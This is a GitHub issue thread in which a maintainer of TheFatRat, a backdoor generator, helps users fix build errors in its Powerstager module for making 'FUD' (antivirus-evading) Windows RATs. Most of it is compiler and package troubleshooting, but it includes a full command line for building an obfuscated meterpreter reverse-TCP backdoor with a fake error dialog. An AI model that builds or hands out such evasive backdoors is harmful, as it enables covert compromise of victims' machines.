### ISSUE TITLE
[x] There was an error creating your FUD rat with Powerstager .

### ISSUE THREAD

**Issue by IamSolos** [Screetsec/TheFatRat#391] opened 2019-12-04 13:32 UTC
Hi, I have a problem with Thefatrat, with Fudwin
Fudwin.log:

/usr/bin/x86_64-w64-mingw32-gcc
Traceback (most recent call last):
  File "tools/power.py", line 15, in <module>
    import urllib.parse

ImportError: No module named parse

Thank you !

_(sorry if what I say means nothing it’s just that I’m French and I use a translator!)_

**Comment by peterpt** [comment] 2019-12-04 16:53
write in your terminal :
python -V

and write here the output

**Comment by IamSolos** [comment] 2019-12-04 17:28
It is written:
Python 2.7.17

Thank you, you answer rather quickly, it's cool ! ^^

**Comment by peterpt** [comment] 2019-12-05 16:04
inside your fatrat main folder write these commands in terminal .
cd tools && rm power.py && wget https://raw.githubusercontent.com/Screetsec/TheFatRat/master/tools/power.py && chmod +x power.py

then still inside "fatrat/tools" folder write this next command and tell me what was the output of it .

python power.py

**Comment by IamSolos** [comment] 2019-12-06 12:21
Uh... 
![image](https://user-images.githubusercontent.com/58517256/70322778-48aa4480-182b-11ea-955e-8a01fef4e7bd.png)

**Comment by peterpt** [comment] 2019-12-06 12:40
Write in your terminal
pip install names

And run it again

**Comment by IamSolos** [comment] 2019-12-06 14:08
mmmh...
![image](https://user-images.githubusercontent.com/58517256/70328792-2d930100-183a-11ea-93a7-055ec6e81fc0.png)

**Comment by peterpt** [comment] 2019-12-06 16:11
apt-get install python-pip && pip install names

**Comment by IamSolos** [comment] 2019-12-06 16:21
uh... now : 

/usr/bin/x86_64-w64-mingw32-gcc
  [38;5;160m   ___                       __ _                        [0m
  [38;5;161m  / _ \_____      _____ _ __/ _\ |_ __ _  __ _  ___ _ __ [0m
  [38;5;162m / /_)/ _ \ \ /\ / / _ \ '__\ \| __/ _` |/ _` |/ _ \ '__|[0m
  [38;5;163m/ ___/ (_) \ V  V /  __/ |  _\ \ || (_| | (_| |  __/ |   [0m
  [38;5;164m\/    \___/ \_/\_/ \___|_|  \__/\__\__,_|\__, |\___|_|   [0m
  [38;5;130m   _ __  _   _                           [38;5;164m|___/[38;5;130m           [0m
  [38;5;131m  | '_ \| | | |                                          [0m
  [38;5;132m _| |_) | |_| |  A payload stager using PowerShell       [0m
  [38;5;133m(_) .__/ \__, |  Created by z0noxz                       [0m
  [38;5;134m  |_|    |___/                                           [0m
  
  Working...Traceback (most recent call last):
  File "tools/power.py", line 2962, in <module>
    main(sys.argv[1:])
  File "tools/power.py", line 2949, in main
    compile_source()
  File "tools/power.py", line 2694, in compile_source
    Print.add_name_value("File signature", hashlib.md5(open(output, "rb").read()).hexdigest(), Print.info)
IOError: [Errno 2] No such file or directory: 'test'

**Comment by peterpt** [comment] 2019-12-06 18:25
now that is a different story .
It looks an input/output error , witch means that script was trying to write but was unable to do it .

Write here all the steps you used in fatrat to create that error , ommit only your ip from the info you will provide .

In mean while try as name for the EXE : test32
and select as payload the : /windows/meterpreter/reverse_tcp
for port use : 8888

do this test .
Dont forget to write here all the steps you did to create that error , so i can test it here .

**Comment by IamSolos** [comment] 2019-12-06 18:55
Okay, first of all, I’m running TheFatRat, obviously, 

after i choose Fudwin (2)
and then i choose PowerStager (1)
and after:

```
   Set LHOST IP : 192.168.130.XX (My IPV4)

   Set LPORT: 4444

   Please enter the base name for output files : hello     

   Select Windows Architeture target

     1 - 32Bit (XP,7,Vista)
     2 - 64Bit (XP64,Vista,7,8,10)

 Choose (1,2) : 1



   +--------------------+
   | Current icons list |
   +--------------------+

 No file name was written

 Building EXE with default icon


 [*] Builing your powerstage rat for windows with the following values

   Target        : Windows 32 Bit
   Your IP/Host  : 192.168.130.XX (Again, my IPV4)
   Your Port     : 4444
   Rat Filename  : hello

 [*] Starting the creation of your FUD 32bit Exe
 
[x] There was an error creating your FUD rat with Powerstager .
 
Press [ENTER] key to continue to return to fatrat menu

```

Fudwin.log :

```
/usr/bin/x86_64-w64-mingw32-gcc
  [38;5;160m   ___                       __ _                        [0m
  [38;5;161m  / _ \_____      _____ _ __/ _\ |_ __ _  __ _  ___ _ __ [0m
  [38;5;162m / /_)/ _ \ \ /\ / / _ \ '__\ \| __/ _` |/ _` |/ _ \ '__|[0m
  [38;5;163m/ ___/ (_) \ V  V /  __/ |  _\ \ || (_| | (_| |  __/ |   [0m
  [38;5;164m\/    \___/ \_/\_/ \___|_|  \__/\__\__,_|\__, |\___|_|   [0m
  [38;5;130m   _ __  _   _                           [38;5;164m|___/[38;5;130m           [0m
  [38;5;131m  | '_ \| | | |                                          [0m
  [38;5;132m _| |_) | |_| |  A payload stager using PowerShell       [0m
  [38;5;133m(_) .__/ \__, |  Created by z0noxz                       [0m
  [38;5;134m  |_|    |___/                                           [0m
  
  Working...Traceback (most recent call last):
  File "tools/power.py", line 2962, in <module>
    main(sys.argv[1:])
  File "tools/power.py", line 2949, in main
    compile_source()
  File "tools/power.py", line 2694, in compile_source
    Print.add_name_value("File signature", hashlib.md5(open(output, "rb").read()).hexdigest(), Print.info)
IOError: [Errno 2] No such file or directory: 'hello'
```

**Comment by peterpt** [comment] 2019-12-06 20:13
ok , let me check here and i will get to you when i figure out what is happening .
in mean while if you want to do some tests you can use the script individually in tools .

on Tools folder write :

python power.py -h
to bring up the help on the script .

if you look into line 1824 in https://github.com/Screetsec/TheFatRat/blob/master/fatrat
file , you will see how we compile the backdoor .
basically is like this next example :

python power.py --target win32 --meterpreter --lhost "yourip" --lport "yourport" --fake-error --obfuscation --output yourfile

try it manually to see if same thing happens while i dont reply to you again about this subject .

**Comment by IamSolos** [comment] 2019-12-06 20:28
Okay, I did it with : 

`root@kali:~/TheFatRat/tools# python power.py --target win32 --meterpreter --lhost 192.168.130.XX --lport 4444 --fake-error --obfuscation --output windowsbd`

Output : 

```
     ___                       __ _                        
    / _ \_____      _____ _ __/ _\ |_ __ _  __ _  ___ _ __ 
   / /_)/ _ \ \ /\ / / _ \ '__\ \| __/ _` |/ _` |/ _ \ '__|
  / ___/ (_) \ V  V /  __/ |  _\ \ || (_| | (_| |  __/ |   
  \/    \___/ \_/\_/ \___|_|  \__/\__\__,_|\__, |\___|_|   
     _ __  _   _                           |___/           
    | '_ \| | | |                                          
   _| |_) | |_| |  A payload stager using PowerShell       
  (_) .__/ \__, |  Created by z0noxz                       
    |_|    |___/                                           
  
Traceback (most recent call last):
  File "power.py", line 2962, in <module>
    main(sys.argv[1:])
  File "power.py", line 2949, in main
    compile_source()
  File "power.py", line 2694, in compile_source
    Print.add_name_value("File signature", hashlib.md5(open(output, "rb").read()).hexdigest(), Print.info)
IOError: [Errno 2] No such file or directory: 'windowsbd' 
```

**Comment by peterpt** [comment] 2019-12-06 21:45
My output : 
![issue](https://user-images.githubusercontent.com/7487321/70358549-a5b3f380-1847-11ea-87c6-3417c10d8318.png)

Eventually this will be an hard issue to track , but we will try another thing .

**Comment by IamSolos** [comment] 2019-12-06 21:56
I’ll try to reinstall my Linux, and I’ll come back after...

It may be because of my linux that is not up to date or something like that

At home it’s 11:00 PM and I don’t have time to redo everything, I’ll be back tomorrow around 10am UTC !

**Comment by peterpt** [comment] 2019-12-06 22:02
1st of all make sure you have kali repositories installed in /etc/apt/sources.list
Kali repo : deb http://http.kali.org/kali kali-rolling main non-free contrib

https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/

then do an update and upgrade : 
apt-get update && apt-get upgrade

now here it comes the most difficult part .

I want you to compile the original git from Powerstager .

https://github.com/z0noxz/powerstager

this next part i have no idea if kali have all these required packages , but try : 
apt-get install python3 python3-setuptools i686-w64-mingw32-gcc x86_64-w64-mingw32-gcc i686-w64-mingw32-windres x86_64-w64-mingw32-windres

and then follow powerstager git installation (it is in their main page the setup) .
when you get all finished run powerstager from outside fatrat folder 

powerstager --target win32 --meterpreter --lhost 192.168.130.20 --lport 4444 --fake-error --obfuscation --output windowsbd

and let me know how it went .

( i am not pretty sure what is wrong there because powerstager complies about writing problems , and since we did not write that particular script then it is not easy to find out .)

**Comment by IamSolos** [comment] 2019-12-06 23:30
Uh... Good night x)
![image](https://user-images.githubusercontent.com/58517256/70363446-acaf2600-1888-11ea-9ef2-7cde1519114e.png)

**Comment by peterpt** [comment] 2019-12-07 12:58
apt-get install  python3 python3-setuptools binutils-mingw-w64-i686 binutils-mingw-w64-x86-64 gcc-mingw-w64-i686 gcc-mingw-w64-x86-64

**Comment by IamSolos** [comment] 2019-12-07 17:59
I am back !
And linux too !

Did you find a solution?
For my part, I saw that I miss Mingw32 but, I can not install it because I am in x64  ^^'

**Comment by IamSolos** [comment] 2019-12-07 18:02
Hellow !
I saw that I miss Mingw32 (because Powerstager works in 32x) but, I can not install it because I am in x64  ^^'

**Comment by peterpt** [comment] 2019-12-07 20:14
nop , that is not right .
In linux things dont work that way .

Did you installed the packages ?

**Comment by IamSolos** [comment] 2019-12-07 21:07
Uh... I have a new problem but that comes directly from Linux, the interface is no longer the same I am lost!!!
I tried to reinstalle it four times and it doesn’t go back to normal...
And no trace of old data.

![image](https://user-images.githubusercontent.com/58517256/70380592-ec841500-193d-11ea-81bd-854e71e2d163.png)

**Comment by peterpt** [comment] 2019-12-08 17:54
that is the new version of kali , if you are use to the terminal , browser , and file explorer on the desktop then you can add it using a tool inside the menu .
Menu can be found on your top left .

**Comment by IamSolos** [comment] 2019-12-08 18:00
Uh, okay 
There’s no way to get the old one back?

anyway, I reinstaller everything and powerstager does not work ;(

**Comment by peterpt** [comment] 2019-12-09 13:17
that powerstager is the one you cloned from original git ?

**Comment by IamSolos** [comment] 2019-12-09 16:48
no actually I forgot to reinstall it
My problem now is:

> ![image](https://user-images.githubusercontent.com/58517256/70455136-0a6f8800-1aac-11ea-832e-793f4f3ddedd.png)

I already did apt-get python3-pip && pip3 install names

**Comment by peterpt** [comment] 2019-12-09 22:35
look , you should not take individual steps because then i will be lost in the sequence i am trying to make with you .
I need you to clone https://github.com/z0noxz/powerstager git and then execute the normal installation of the tool by inserting inside its folder "python setup.py install" 
then after that if the problem persists then you should create an issue in original git , case some package is missing then i can help you with that .

Originally powerstager was build to work with python3 , i adapted it to work with python 2.7 because at the time i implemented that tool there was some hard errors in python 3.0 , so it stayed at 2.7  , but it looks that in fatrat that script using python 2.7 is not working with you , this way i need you to compile the original git of the tool to test if it works that way .

Fatrat is a conjunction of multiple tools working in a bash script , we practically build only the running script that launches all those tools is a simple menu , more user friendly .
If a particular error appear in executing a tool that we have in fatrat , most of the times are packages missing , but other times could be an error in tool code that is trigger by some unknown variables that only the original builder of that tool can understand because he/she was the one that wrote the code and know all the steps that code takes and why it takes .

**Comment by wowlooser** [comment] 2019-12-10 01:22
"LHOST and LPORT must be specified when generating a meterpreter payload."
my fudwin.log is
what is wrong?

**Comment by IamSolos** [comment] 2019-12-10 16:42
I installed it with https://github.com/z0noxz/powerstager and it does not work ^^

**Comment by adada111** [comment] 2019-12-11 07:23
![image](https://user-images.githubusercontent.com/54429391/70600203-141efa00-1c2a-11ea-8c95-31dd23dd5bfc.png)
i need help

**Comment by IamSolos** [comment] 2019-12-11 10:26
@adada111 I have the same problem! x)

**Comment by peterpt** [comment] 2019-12-11 21:56
for those who have this issue i need to do a checkup first to get a notion of what may be the issue .

I need you all individually to open a terminal and run these commands : 
i686-w64-mingw32-gcc --version
x86_64-w64-mingw32-gcc --version
i686-w64-mingw32-windres --version
x86_64-w64-mingw32-windres --version

To you all compare your versions with mine , i have these : 
i686-w64-mingw32-gcc   =  7.3-win32 20180506
x86_64-w64-mingw32-gcc =  7.3-win32 20180506
i686-w64-mingw32-windres = 2.30.90.20180627
x86_64-w64-mingw32-windres = 2.30.90.20180627


Then write in your terminal these commands and post here the outputs : 
apt-cache policy gcc-mingw-w64-i686
apt-cache policy gcc-mingw-w64-x86-64
apt-cache policy binutils-mingw-w64-i686
apt-cache policy binutils-mingw-w64-x86-64

**Comment by adada111** [comment] 2019-12-12 01:02
![image](https://user-images.githubusercontent.com/54429391/70673619-1c287980-1cbe-11ea-9349-bec5a1c8d65d.png)

**Comment by adada111** [comment] 2019-12-12 01:07
![image](https://user-images.githubusercontent.com/54429391/70673786-bd173480-1cbe-11ea-8939-bedf43325f5f.png)

**Comment by peterpt** [comment] 2019-12-12 21:16
This is a long shot with no idea if thiis really the cause of the problem .
Maybe it will be interesting if you downgrade those tools to debian jessie repository .
I am not sure but i think mine were from jessie repositories .
all you have to do is to add jessie repositories to this file
/etc/apt/sources.list

deb http://deb.debian.org/debian/ jessie main contrib non-free
deb-src http://deb.debian.org/debian/ jessie main contrib non-free


then after adding it , you must do an update :
apt-get update

then you should look in each package witch version exist in jessies repo .


example :
after writing with jessie repository in sources.list and updated  :
apt-cache policy gcc-mingw-w64-i686

You will get the output as you have now and an extra line witch is a lower version of the tool inside
jessie repository .

to downgrade look this link as example for firefox :
https://www.linuxuprising.com/2019/02/how-to-downgrade-packages-to-specific.html

**Comment by adada111** [comment] 2019-12-13 00:44
I have added the source, but I don't know which tools should be downgraded. can you tell me ?

**Comment by peterpt** [comment] 2019-12-13 22:33
for powerstager are these :
i686-w64-mingw32-gcc
x86_64-w64-mingw32-gcc
i686-w64-mingw32-windres
x86_64-w64-mingw32-windres

you should downgrade using aptitude and not apt .

1st - you should check on each package witch lower version exists on sid , by writinf«g in terminal :

ex : apt-cache policy gcc-mingw-w64-i686

then look at the lowest version , witch should be sid repository , and then use aptitude like this :

aptitude install gcc-mingw-w64-i686="version number"

Like i told , this is a long shot , and i am not pretty sure why this error happens in some people here .
I remember i installed my fatrat using a repository that still had mingw32  , instead gcc-mingw-w64-i686  , witch is an emulated 32bit from 64bit gcc  , but like i said , this is a long shot .
Try it to see if it solves anything .

**Comment by adada111** [comment] 2019-12-14 01:19
This is not feasible, if  i run  ./setup.py , It will become the original version again.

**Comment by peterpt** [comment] 2019-12-14 09:54
look , i am loosing my patience on this topic .
Just Downgrade the packages , you dont need to run setup.py from powerstager .

**Comment by peterpt** [comment] 2019-12-14 09:59
i will create a VM using latest kali linux to test

**Comment by adada111** [comment] 2019-12-14 12:57
thanks

**Comment by peterpt** [comment] 2019-12-14 23:01
Ok , finally i installed latest kali in a VM and tryed power.py from fatrat and got the issue you got now .
This is good news , because after this point since i get same error i will try to figure out why is happening and then explain it to you how to fix it .

**Comment by peterpt** [comment] 2019-12-14 23:35
ok , fixed the issue .
The problem is in mingw version in kali .
![mingw](https://user-images.githubusercontent.com/7487321/70855842-85b3ae00-1e9f-11ea-8a48-d27eaf17c72e.png)

you must add debian jessie repositories to your sources.list .

deb http://deb.debian.org/debian/ oldstable main contrib non-free
deb-src http://deb.debian.org/debian/ oldstable main contrib non-free

deb http://deb.debian.org/debian/ oldstable-updates main contrib non-free
deb-src http://deb.debian.org/debian/ oldstable-updates main contrib non-free

and put an "#" behind kali repository link 

then write in terminal : apt-get clean && apt-get clean cahe

then you should remove all these packages : 
apt-get remove --purge gcc-mingw-w64-i686 gcc-mingw-w64-x86-64 binutils-mingw-w64-i686 binutils-mingw-w64-x86-64 && apt-get autoremove -y

then to finish , you should do "still with # behind kali repository link in sources.list"
apt-get update && apt-get install gcc-mingw-w64-i686 gcc-mingw-w64-x86-64 binutils-mingw-w64-i686 binutils-mingw-w64-x86-64

**Comment by adada111** [comment] 2019-12-15 03:00
i will try again, thanks

**Comment by adada111** [comment] 2019-12-15 03:23
![image](https://user-images.githubusercontent.com/54429391/70857584-73338600-1f2c-11ea-9ef4-e9ff636d59c4.png)
powerfull.py  is ok, but i  want to run ./fatrat , it will also report an error:There was an error creating your FUD rat with Powerstager
![image](https://user-images.githubusercontent.com/54429391/70857634-4469df80-1f2d-11ea-937e-24c39c6a8d27.png)

**Comment by adada111** [comment] 2019-12-15 03:36
it is OK! thank you very much!

**Closed** 2019-12-15 08:25 UTC

**Comment by SLKsky** [comment] 2021-09-16 17:59
bonjours, y'a moyen de m'expliquer ?

**Comment by sagarpritam** [comment] 2022-07-14 14:31
Incorrect 64Bit Version for Fudwin in Fatrat    which version is required

**Comment by jakhongirav** [comment] 2023-07-24 20:07
![image](https://github.com/screetsec/TheFatRat/assets/115360657/1231c8de-b9b6-4b60-9510-f40c439e0a21)
again this problem on my ubuntu

**Comment by jakhongirav** [comment] 2023-07-24 20:08
> ok , fixed the issue . The problem is in mingw version in kali . ![mingw](https://user-images.githubusercontent.com/7487321/70855842-85b3ae00-1e9f-11ea-8a48-d27eaf17c72e.png)
> 
> you must add debian jessie repositories to your sources.list .
> 
> deb http://deb.debian.org/debian/ oldoldstable main contrib non-free deb-src http://deb.debian.org/debian/ oldoldstable main contrib non-free
> 
> deb http://deb.debian.org/debian/ oldoldstable-updates main contrib non-free deb-src http://deb.debian.org/debian/ oldoldstable-updates main contrib non-free
> 
> and put an "#" behind kali repository link
> 
> then write in terminal : apt-get clean && apt-get clean cahe
> 
> then you should remove all these packages : apt-get remove --purge gcc-mingw-w64-i686 gcc-mingw-w64-x86-64 binutils-mingw-w64-i686 binutils-mingw-w64-x86-64 && apt-get autoremove -y
> 
> then to finish , you should do "still with # behind kali repository link in sources.list" apt-get update && apt-get install gcc-mingw-w64-i686 gcc-mingw-w64-x86-64 binutils-mingw-w64-i686 binutils-mingw-w64-x86-64
> 
> Resuming : The person who build powerstager did not upgraded his script to the new versions of gcc , by this it means that some commands in gcc probably was changed , and powerstager still uses the old commands , so when the script tries to compile the exe gives an error , but then the script ahead prompts the error you see because the file was not created .
> 
> To finish : Fixing these gcc versions will fix also the same problem you have in fatrat because the problem is the same thing .

Can you help me?

**Comment by pinkf-loyd** [comment] 2023-09-08 23:38
Hi,
Issue 1: Incorrect Mingw-W64 Versions in FatRat

When you run the chk_tools tool in FatRat, it reports that the Mingw-W64 versions are incorrect for Fudwin in FatRat. You attempted to resolve this issue by removing existing Mingw-W64 packages and reinstalling them from the Kali Linux repository, but this caused conflicts with Metasploit Framework.

Issue 2: Unintentional Removal of Metasploit Framework

When you tried to address the problem with Mingw-W64 packages, Metasploit Framework was unintentionally uninstalled due to unsatisfied dependencies.

Issue 3: Failure to Add Debian Jessie Repository

You tried to add the Debian Jessie repositories to obtain the correct Mingw-W64 versions, but you encountered a 404 error when updating packages.

Issue 4: Failure to Install Correct Mingw-W64 Versions

When attempting to install the correct Mingw-W64 versions from the Kali Linux repository, you received a message indicating that the packages are already up to date, even though the FatRat tool still reports incorrect versions.

These issues can be confusing as they appear to be related to dependency conflicts between Metasploit Framework and the Mingw-W64 versions required for FatRat.
CAN YOU HELP ME PLEASE???

**Comment by pinkf-loyd** [comment] 2023-09-11 08:34
??????

**Comment by mekbau** [comment] 2024-11-12 13:41
![Screenshot at 2024-11-12 20-40-22](https://github.com/user-attachments/assets/800806ff-d9e0-41c1-b96a-ea0573a04090)
help mee guide me step by step :)
